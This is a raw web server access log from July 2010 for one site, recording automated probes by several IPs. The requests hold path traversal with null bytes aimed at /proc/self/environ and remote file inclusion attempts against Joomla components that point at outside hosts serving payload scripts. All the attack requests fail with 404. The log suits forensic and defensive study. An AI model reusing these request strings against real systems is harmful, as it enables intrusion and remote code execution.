75.125.250.138 - - [01/Jul/2010:12:54:11 -0700] "GET /index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.de-construction.com"
75.125.250.138 - - [01/Jul/2010:12:54:23 -0700] "GET /logs//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.de-construction.com"
75.125.250.138 - - [01/Jul/2010:12:54:23 -0700] "GET /index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.de-construction.com"
89.152.109.1 - - [01/Jul/2010:12:54:26 -0700] "GET /index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.de-construction.com"
89.152.109.1 - - [01/Jul/2010:12:55:34 -0700] "GET /logs//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.de-construction.com"
89.152.109.1 - - [01/Jul/2010:12:55:35 -0700] "GET /index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.de-construction.com"
75.125.250.138 - - [01/Jul/2010:12:58:25 -0700] "GET /logs/access_100601.log//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.de-construction.com"
75.125.250.138 - - [01/Jul/2010:12:58:25 -0700] "GET /index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.de-construction.com"
75.125.250.138 - - [01/Jul/2010:12:58:25 -0700] "GET /logs//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.de-construction.com"
89.152.109.1 - - [01/Jul/2010:12:58:54 -0700] "GET /logs/access_100601.log//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.de-construction.com"
89.152.109.1 - - [01/Jul/2010:12:58:54 -0700] "GET /index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.de-construction.com"
89.152.109.1 - - [01/Jul/2010:12:58:55 -0700] "GET /logs//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.de-construction.com"
219.240.36.36 - - [01/Jul/2010:13:00:18 -0700] "GET /logs/access_100531.log//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.de-construction.com"
219.240.36.36 - - [01/Jul/2010:13:00:19 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.de-construction.com"
219.240.36.36 - - [01/Jul/2010:13:00:19 -0700] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.de-construction.com"
75.125.250.138 - - [01/Jul/2010:13:00:46 -0700] "GET /index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.de-construction.com"
89.152.109.1 - - [01/Jul/2010:13:01:15 -0700] "GET /index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.de-construction.com"
213.179.32.13 - - [01/Jul/2010:13:01:24 -0700] "GET /index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.829" "www.de-construction.com"
75.125.250.138 - - [01/Jul/2010:13:03:27 -0700] "GET /logs/access_100601.log//index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.de-construction.com"
75.125.250.138 - - [01/Jul/2010:13:03:27 -0700] "GET /index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.79" "www.de-construction.com"
75.125.250.138 - - [01/Jul/2010:13:03:27 -0700] "GET /logs//index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.de-construction.com"
89.152.109.1 - - [01/Jul/2010:13:04:19 -0700] "GET /logs//index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.de-construction.com"
89.152.109.1 - - [01/Jul/2010:13:04:19 -0700] "GET /index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.de-construction.com"
89.152.109.1 - - [01/Jul/2010:13:04:42 -0700] "GET /logs/access_100601.log//index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.de-construction.com"
89.152.109.1 - - [01/Jul/2010:13:04:43 -0700] "GET /index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.de-construction.com"
89.152.109.1 - - [01/Jul/2010:13:04:43 -0700] "GET /logs//index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.de-construction.com"
213.179.32.13 - - [01/Jul/2010:13:04:47 -0700] "GET /logs/access_100601.log//index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.829" "www.de-construction.com"
213.179.32.13 - - [01/Jul/2010:13:04:47 -0700] "GET /index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.829" "www.de-construction.com"
213.179.32.13 - - [01/Jul/2010:13:04:47 -0700] "GET /logs//index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.829" "www.de-construction.com"
213.179.32.13 - - [01/Jul/2010:13:05:07 -0700] "GET /logs//index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.829" "www.de-construction.com"
213.179.32.13 - - [01/Jul/2010:13:05:07 -0700] "GET /index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.829" "www.de-construction.com"
211.63.60.50 - - [01/Jul/2010:13:08:55 -0700] "GET /logs/error.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
211.63.60.50 - - [01/Jul/2010:13:08:55 -0700] "GET /logs/access_100531.log/error.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
211.63.60.50 - - [01/Jul/2010:13:08:55 -0700] "GET /error.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
213.179.32.13 - - [01/Jul/2010:13:11:53 -0700] "GET /logs/access_100601.log//index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.829" "www.de-construction.com"
213.179.32.13 - - [01/Jul/2010:13:11:53 -0700] "GET /index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.829" "www.de-construction.com"
213.179.32.13 - - [01/Jul/2010:13:11:54 -0700] "GET /logs//index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.829" "www.de-construction.com"
211.63.60.50 - - [01/Jul/2010:13:14:14 -0700] "GET /logs/access.log/error.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
211.63.60.50 - - [01/Jul/2010:13:14:14 -0700] "GET /error.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
211.63.60.50 - - [01/Jul/2010:13:14:14 -0700] "GET /logs/error.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
69.73.155.53 - - [01/Jul/2010:13:18:40 -0700] "GET /logs//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
69.73.155.53 - - [01/Jul/2010:13:18:40 -0700] "GET /index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
89.185.231.103 - - [01/Jul/2010:13:25:06 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
89.185.231.103 - - [01/Jul/2010:13:25:06 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
89.185.231.103 - - [01/Jul/2010:13:25:06 -0700] "GET /logs/access_100501.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
89.185.231.103 - - [01/Jul/2010:13:25:52 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
89.185.231.103 - - [01/Jul/2010:13:25:52 -0700] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
89.185.231.103 - - [01/Jul/2010:13:25:52 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
89.185.231.103 - - [01/Jul/2010:13:26:59 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
89.185.231.103 - - [01/Jul/2010:13:26:59 -0700] "GET /logs/access_100501.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
89.185.231.103 - - [01/Jul/2010:13:26:59 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
95.108.247.251 - - [01/Jul/2010:13:27:23 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.de-construction.com"
89.185.231.103 - - [01/Jul/2010:13:27:39 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
89.185.231.103 - - [01/Jul/2010:13:27:40 -0700] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
89.185.231.103 - - [01/Jul/2010:13:27:40 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
89.185.231.103 - - [01/Jul/2010:13:27:45 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
89.185.231.103 - - [01/Jul/2010:13:27:45 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
89.185.231.103 - - [01/Jul/2010:13:27:45 -0700] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
89.185.231.103 - - [01/Jul/2010:13:28:34 -0700] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
89.185.231.103 - - [01/Jul/2010:13:28:34 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
89.185.231.103 - - [01/Jul/2010:13:28:34 -0700] "GET /logs/access_100401.log//modules/4nAlbum/public/displayCategory.php?basepath=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
61.47.40.40 - - [01/Jul/2010:13:29:10 -0700] "GET /logs/access_100531.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://evocraft.com/CMS/fx1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
61.47.40.40 - - [01/Jul/2010:13:29:10 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://evocraft.com/CMS/fx1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
61.47.40.40 - - [01/Jul/2010:13:29:10 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://evocraft.com/CMS/fx1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
61.47.40.40 - - [01/Jul/2010:13:30:27 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://evocraft.com/CMS/fx1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
61.47.40.40 - - [01/Jul/2010:13:30:27 -0700] "GET /logs/access.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://evocraft.com/CMS/fx1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
61.47.40.40 - - [01/Jul/2010:13:30:27 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://evocraft.com/CMS/fx1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
64.150.180.136 - - [01/Jul/2010:13:31:02 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.everyedge.com/components/1.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
64.150.180.136 - - [01/Jul/2010:13:31:02 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.everyedge.com/components/1.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
64.150.180.136 - - [01/Jul/2010:13:31:02 -0700] "GET /logs/access_100531.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.everyedge.com/components/1.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
61.47.40.40 - - [01/Jul/2010:13:31:22 -0700] "GET /logs/access.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://evocraft.com/CMS/fx1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
61.47.40.40 - - [01/Jul/2010:13:31:22 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://evocraft.com/CMS/fx1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
61.47.40.40 - - [01/Jul/2010:13:31:22 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://evocraft.com/CMS/fx1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
64.150.180.136 - - [01/Jul/2010:13:31:35 -0700] "GET /logs/access_100531.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.everyedge.com/components/1.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
64.150.180.136 - - [01/Jul/2010:13:31:35 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.everyedge.com/components/1.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
64.150.180.136 - - [01/Jul/2010:13:31:35 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.everyedge.com/components/1.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
64.150.180.136 - - [01/Jul/2010:13:31:39 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.everyedge.com/components/1.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
64.150.180.136 - - [01/Jul/2010:13:31:39 -0700] "GET /logs/access_100601.log%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.everyedge.com/components/1.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
64.150.180.136 - - [01/Jul/2010:13:31:39 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.everyedge.com/components/1.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
67.205.67.73 - - [01/Jul/2010:13:31:50 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://marthoma.ws/cm/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
67.205.67.73 - - [01/Jul/2010:13:31:50 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://marthoma.ws/cm/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
67.205.67.73 - - [01/Jul/2010:13:31:50 -0700] "GET /logs/access_100601.log%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://marthoma.ws/cm/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
67.205.67.73 - - [01/Jul/2010:13:32:21 -0700] "GET /logs/access_100601.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://marthoma.ws/cm/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
67.205.67.73 - - [01/Jul/2010:13:32:21 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://marthoma.ws/cm/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
67.205.67.73 - - [01/Jul/2010:13:32:21 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://marthoma.ws/cm/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
67.205.67.73 - - [01/Jul/2010:13:32:25 -0700] "GET /logs/access.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://marthoma.ws/cm/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
67.205.67.73 - - [01/Jul/2010:13:32:25 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://marthoma.ws/cm/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
67.205.67.73 - - [01/Jul/2010:13:32:25 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://marthoma.ws/cm/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
67.205.67.73 - - [01/Jul/2010:13:32:41 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://marthoma.ws/cm/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
67.205.67.73 - - [01/Jul/2010:13:32:41 -0700] "GET /logs/access_100601.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://marthoma.ws/cm/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
67.205.67.73 - - [01/Jul/2010:13:32:41 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://marthoma.ws/cm/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
92.243.84.187 - - [01/Jul/2010:13:33:28 -0700] "GET /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=file&folder= HTTP/1.0" 404 - "www.de-construction.com/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=file&folder=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "www.de-construction.com"
64.150.180.136 - - [01/Jul/2010:13:34:08 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.everyedge.com/components/1.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
64.150.180.136 - - [01/Jul/2010:13:34:08 -0700] "GET /logs/access.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.everyedge.com/components/1.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
64.150.180.136 - - [01/Jul/2010:13:34:08 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.everyedge.com/components/1.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
69.175.127.170 - - [01/Jul/2010:13:35:52 -0700] "GET /logs/access.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.dbac.ac.th/smf115/chat/fx1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
69.175.127.170 - - [01/Jul/2010:13:35:52 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.dbac.ac.th/smf115/chat/fx1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
69.175.127.170 - - [01/Jul/2010:13:35:52 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.dbac.ac.th/smf115/chat/fx1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
62.149.14.44 - - [01/Jul/2010:13:36:26 -0700] "GET /logs/access.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
62.149.14.44 - - [01/Jul/2010:13:36:26 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
62.149.14.44 - - [01/Jul/2010:13:36:26 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
216.131.96.193 - - [01/Jul/2010:13:36:38 -0700] "GET /logs/access_100531.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
